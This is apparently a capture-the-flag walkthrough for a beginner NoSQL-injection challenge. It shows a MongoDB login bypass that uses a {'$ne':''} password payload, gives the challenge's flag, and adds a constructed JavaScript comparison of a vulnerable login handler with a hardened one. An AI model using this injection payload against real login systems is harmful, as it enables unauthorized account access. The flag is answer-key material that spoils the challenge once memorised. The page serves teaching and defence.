HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

VaultDB — NoSQL Login Bypass

NoSQL Injection
Difficulty: Beginner
Vuln class: NoSQL Injection
Steps: 2
// Objective
Bypass the MongoDB-backed login by injecting a $ne operator in the password field.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Attempt a normal login
Try logging in with wrong credentials. Observe the 401 Unauthorized response and the JSON error.
Command / Input
POST /api/login {"username":"admin","password":"wrongpass"}
Output
{"error":"Invalid credentials"}
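2. Inject a $ne operator
MongoDB query filters accept operator objects as well as plain values. Because the server passes the parsed JSON body into the query unchanged, the password value can be replaced with {"$ne": ""} ("password is not equal to the empty string"), which is true for any stored password that is not empty.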
Command / Input
POST /api/login {"username":"admin","password":{"$ne":""}}
Output
{"token":"...","flag":"HackrGG{n0sql_1nj3ct10n_byp4ss3d}"}
The query becomes: db.users.findOne({username:"admin", password:{$ne:""}}) — matches any document with a non-empty password.
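Why the query above matches, and the server-side check that stops it, as an added example that is not part of the original walkthrough or the challenge's code. The in-memory matcher, the handler names loginVulnerable and loginHardened, and the stored password are constructed for illustration; only the two request bodies come from this page.

```javascript
// Constructed sample data: an in-memory stand-in for the users collection.
const users = [{ username: "admin", password: "constructed-Passw0rd" }];

// Minimal matcher covering only equality and $ne, the operator used on this page.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      return "$ne" in cond ? doc[field] !== cond.$ne : false;
    }
    return doc[field] === cond;
  });
}
const findOne = (filter) => users.find((u) => matches(u, filter)) || null;

// Vulnerable handler (hypothetical): the parsed JSON body goes straight into
// the filter, so an object in "password" is interpreted as a query operator.
function loginVulnerable(body) {
  const user = findOne({ username: body.username, password: body.password });
  return user ? 200 : 401;
}

// Hardened handler (hypothetical): both credentials must be strings before
// they reach the query, so operator objects are rejected with 400.
function loginHardened(body) {
  const { username, password } = body ?? {};
  if (typeof username !== "string" || typeof password !== "string") return 400;
  return findOne({ username, password }) ? 200 : 401;
}

// The two request bodies from the walkthrough, parsed as a JSON body parser would.
const wrongPass = JSON.parse('{"username":"admin","password":"wrongpass"}');
const injected = JSON.parse('{"username":"admin","password":{"$ne":""}}');

// Status codes returned by each handler for each body.
function demo() {
  return {
    vulnerableWrongPass: loginVulnerable(wrongPass),
    vulnerableInjected: loginVulnerable(injected),
    hardenedWrongPass: loginHardened(wrongPass),
    hardenedInjected: loginHardened(injected),
  };
}
console.log(demo());
```

A real application would additionally store a password hash and verify it in application code after looking the user up by username, which keeps the password out of the query filter entirely.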
// Flag
Flag value
HackrGG{n0sql_1nj3ct10n_byp4ss3d}
Returned in the login response when the $ne injection bypasses authentication.